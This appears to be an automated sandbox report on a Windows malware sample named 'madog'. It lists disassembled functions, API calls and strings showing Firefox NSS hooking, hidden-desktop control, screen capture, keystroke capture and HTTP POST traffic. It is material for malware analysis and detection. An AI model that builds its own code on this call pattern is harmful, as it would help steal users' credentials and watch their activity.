Part of subcall function 0040E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0040E108
Part of subcall function 0040E0FB: GetThreadDesktop.USER32(00000000), ref: 0040E10F
Part of subcall function 0040E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 0041209E

Part of subcall function 0040C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

Strings

nss3.dll, xrefs: 00412099
nspr4.dll, xrefs: 0041208E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00414CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00414D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00414D19
CreateProcessAsUserW.ADVAPI32(?,00000000,0041C8F5,00000000,00000000,00000000,0041C8F5,0041C8F5,00000000,?,?,?,00000000,00000044), ref: 00414D8A
CloseHandle.KERNEL32(?), ref: 00414D9D
CloseHandle.KERNEL32(?), ref: 00414DA2
FreeLibrary.KERNEL32(?), ref: 00414DB9

Strings

CreateEnvironmentBlock, xrefs: 00414D07
userenv.dll, xrefs: 00414CE6
DestroyEnvironmentBlock, xrefs: 00414D0F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040C103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

Part of subcall function 0040BE3B: VirtualAllocEx.KERNEL32(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0040C160,00422360), ref: 0040BE72

Part of subcall function 0041B58C: InitializeCriticalSection.KERNEL32(00423FE4,76C61857,0040C185,00422360), ref: 0041B5A2
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041B5DE
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(PR_SetError), ref: 0041B5F0
Part of subcall function 0041B58C: GetProcAddress.KERNEL32(PR_GetError), ref: 0041B602

Strings

PR_Write, xrefs: 0040C141
PR_Close, xrefs: 0040C127
nss3.dll, xrefs: 0040C10C
PR_Read, xrefs: 0040C134
PR_OpenTCPSocket, xrefs: 0040C11F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041BD7B, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

EnterCriticalSection.KERNEL32(00423FE4), ref: 0041BDB7
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041BDE5
EnterCriticalSection.KERNEL32(00423FE4), ref: 0041BE09

Part of subcall function 004114C3: InternetCrackUrlA.WININET ref: 004117AC
Part of subcall function 004114C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004117CA
Part of subcall function 004114C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 004118E4
Part of subcall function 004114C3: EnterCriticalSection.KERNEL32(00422AC8), ref: 00411910
Part of subcall function 004114C3: LeaveCriticalSection.KERNEL32(00422AC8,?,?), ref: 0041194D

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 0041835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 004183B8

Part of subcall function 004140F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0041410D

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

LeaveCriticalSection.KERNEL32(00423FE4,00000000,?,00000000), ref: 0041C04C

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C06B
LeaveCriticalSection.KERNEL32(00423FE4), ref: 0041C078

Strings

0, xrefs: 0041BF31
?B, xrefs: 0041BDB1
%x, xrefs: 0041BF11
Content-Length, xrefs: 0041BF55
?B, xrefs: 0041BFB7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

GetWindowThreadProcessId.USER32(?,?), ref: 00405CB4
ResetEvent.KERNEL32(00000010), ref: 00405D03
PostMessageW.USER32(?,?,?,00000010), ref: 00405D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405D35

Part of subcall function 00405B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405B40
Part of subcall function 00405B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405B9A
Part of subcall function 00405B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405BD6
Part of subcall function 00405B28: TerminateProcess.KERNEL32(?,00000000), ref: 00405BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 00405D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00405D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00405DA7

Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DD9
Part of subcall function 00414DCA: CloseHandle.KERNEL32(00000000), ref: 00414DE2

IntersectRect.USER32(?,?), ref: 00405DC7
FillRect.USER32(?,?,00000006), ref: 00405DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00405DED

Part of subcall function 00417A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Part of subcall function 00416B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00412E87,?,19367401,?,00000001,8889347B,00000002), ref: 00416BA9
Part of subcall function 00416B9E: CloseHandle.KERNEL32(00000000), ref: 00416BB4

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 00417AF0: WindowFromPoint.USER32(?,?), ref: 00417B0C
Part of subcall function 00417AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00417B3D
Part of subcall function 00417AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 00417B61
Part of subcall function 00417AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00417B72
Part of subcall function 00417AF0: GetWindowLongW.USER32(?,000000F0), ref: 00417B8F
Part of subcall function 00417AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 0040B6B6
GetParent.USER32(00000000), ref: 0040B6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B6FD
IsWindow.USER32(?), ref: 0040B720

Part of subcall function 0040B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
Part of subcall function 0040B0AD: ReleaseMutex.KERNEL32(?), ref: 0040B0E7
Part of subcall function 0040B0AD: IsWindow.USER32(?), ref: 0040B0EE
Part of subcall function 0040B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
Part of subcall function 0040B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

GetWindowInfo.USER32(00000000,?), ref: 0040B770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040B8AD

Part of subcall function 0040B31C: GetAncestor.USER32(?,00000002), ref: 0040B345
Part of subcall function 0040B31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0040B370
Part of subcall function 0040B31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 0040B3B2
Part of subcall function 0040B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B448
Part of subcall function 0040B31C: PostMessageW.USER32(?,00000112,?,?), ref: 0040B49B
Part of subcall function 0040B31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040B4DA

Part of subcall function 0040DCA2: GetClassNameW.USER32(76FC8F97,?,00000101), ref: 0040DCBD

Part of subcall function 0040B11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B130
Part of subcall function 0040B11C: ReleaseMutex.KERNEL32(?), ref: 0040B14F
Part of subcall function 0040B11C: GetWindowRect.USER32(?,?), ref: 0040B15C
Part of subcall function 0040B11C: IsRectEmpty.USER32(?), ref: 0040B1E0
Part of subcall function 0040B11C: GetWindowLongW.USER32(?,000000F0), ref: 0040B1EF
Part of subcall function 0040B11C: GetParent.USER32(?), ref: 0040B205
Part of subcall function 0040B11C: MapWindowPoints.USER32(00000000,00000000), ref: 0040B20E
Part of subcall function 0040B11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040B232

Strings

<, xrefs: 0040B769
, xrefs: 0040B654
@, xrefs: 0040B806

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00404DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 00404E28
CloseHandle.KERNEL32(?), ref: 00404F89

Part of subcall function 0040E959: CreateMutexW.KERNEL32(00422C30,00000000,00422A60,?,?,00404E69,?,?,?,743C152E,00000002), ref: 0040E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00404EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 00404EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00404F1A

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 00414DF0: CreateThread.KERNEL32(00000000,?,00000000,0040748F,00000000,0040748F), ref: 00414E04
Part of subcall function 00414DF0: CloseHandle.KERNEL32(00000000), ref: 00414E0F

accept.WS2_32(?,00000000,00000000), ref: 00404F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00404F59

Part of subcall function 0041675E: shutdown.WS2_32(?,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(?), ref: 0041676D

CloseHandle.KERNEL32(?), ref: 00404F7A

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Part of subcall function 0040E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0040E8E0

Part of subcall function 00404C68: getsockname.WS2_32(?,?,?), ref: 00404CBE
Part of subcall function 00404C68: CloseHandle.KERNEL32(?), ref: 00404CE2

Strings

K2w, xrefs: 00404EC7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00418AE4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A

Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Strings

FsA, xrefs: 00418BF3
FsA, xrefs: 00418BBE

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041D865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 0041D88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 0041D89D
GetProcessWindowStation.USER32 ref: 0041D8AE

Part of subcall function 0041D83D: GetProcessWindowStation.USER32 ref: 0041D841
Part of subcall function 0041D83D: SetProcessWindowStation.USER32(00000000), ref: 0041D855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0041D8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0041D8FD
GetCurrentThreadId.KERNEL32(?,?,?,0040731A,?,2937498D,?,00000000), ref: 0041D909
GetThreadDesktop.USER32(00000000), ref: 0041D910

Part of subcall function 0041D7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,0041D84D,00000000,?,?,?,0040731A,?,2937498D,?), ref: 0041D81D

SetThreadDesktop.USER32(00000000), ref: 0041D922
CloseDesktop.USER32(00000000), ref: 0041D934
CloseWindowStation.USER32(?), ref: 0041D94F

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 0040775B
SetThreadPriority.KERNEL32(00000000), ref: 00407762

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

WaitForSingleObject.KERNEL32(0000EA60), ref: 00407780

Part of subcall function 00419A9E: RegOpenKeyExW.ADVAPI32(80000001,00423EC0,00000000,00000001,?), ref: 00419ADD

CreateMutexW.KERNEL32(00422C30,00000001,?,20000000), ref: 00407843
GetLastError.KERNEL32 ref: 00407853
CloseHandle.KERNEL32(00000000), ref: 00407861

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

Part of subcall function 00414DF0: CreateThread.KERNEL32(00000000,?,00000000,0040748F,00000000,0040748F), ref: 00414E04
Part of subcall function 00414DF0: CloseHandle.KERNEL32(00000000), ref: 00414E0F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 00407919

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Strings

Global\%08X%08X%08X, xrefs: 0040781D

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041C912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 0041C929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,0041D2A8), ref: 0041C955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?), ref: 0041C984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041CA0D

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,0041C9A1,00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C9A1,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,0041C9A1,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.ADVAPI32(0041C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(0041C9A1), ref: 00414B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041D2A8,?,?,00000000), ref: 0041C9A1

Part of subcall function 0041C8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C9FB,00000000,?,?,?), ref: 0041C8C6
Part of subcall function 0041C8A1: CloseHandle.KERNEL32(?), ref: 0041C907

Strings

SeTcbPrivilege, xrefs: 0041C997
.exe, xrefs: 0041C93B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004150A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 004150EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00415112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00415137
InternetCloseHandle.WININET(00000000), ref: 0041514F

Strings

HTTP/1.1, xrefs: 004150DF
Connection: close, xrefs: 00415103, 00415110
POST, xrefs: 004150C9
GET, xrefs: 004150D0, 004150E7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041C5CA, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64

APIs

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 0041C5ED
LdrLoadDll.NTDLL(?,?,?,?), ref: 0041C5FD
EnterCriticalSection.KERNEL32(0042400C), ref: 0041C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0041C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 0041C64C

Part of subcall function 0040C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,004120A9), ref: 0040C111
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,004120A9), ref: 0040C125
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0040C132
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0040C13F
Part of subcall function 0040C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040C14C

LeaveCriticalSection.KERNEL32(0042400C), ref: 0041C669

Strings

nss3.dll, xrefs: 0041C646
nspr4.dll, xrefs: 0041C63A

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00409489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004094EF

Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 004092D4
Part of subcall function 0040929D: StrStrIW.SHLWAPI(?,?), ref: 0040935C
Part of subcall function 0040929D: StrStrIW.SHLWAPI(?,?), ref: 0040936D
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00409389
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 004093A7
Part of subcall function 0040929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 004093C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0040950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00409582

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040961F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

&, xrefs: 00409560
$, xrefs: 00409552
#, xrefs: 00409567

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041AEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 0041B053

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

EnterCriticalSection.KERNEL32(00423FB4), ref: 0041AF36
LeaveCriticalSection.KERNEL32(00423FB4), ref: 0041AFD9

Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040EA43
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040EA54
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0040EA61
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0040EA6E
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0040EA7B
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0040EA88
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0040EA95
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0040EAA2
Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 0040EAEA
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040EAF5
Part of subcall function 0040EA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040EB07
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040EB12
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0040EB1E
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0040EB2B
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0040EB38
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0040EB45
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0040EB52
Part of subcall function 0040EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0040EB5F
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(00000000), ref: 0040EE9C
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(?), ref: 0040EEA6
Part of subcall function 0040EA11: FreeLibrary.KERNEL32(00000000), ref: 0040EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 0041AF9B

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

GetKeyboardState.USER32(?), ref: 0041AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0041B01B

Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C
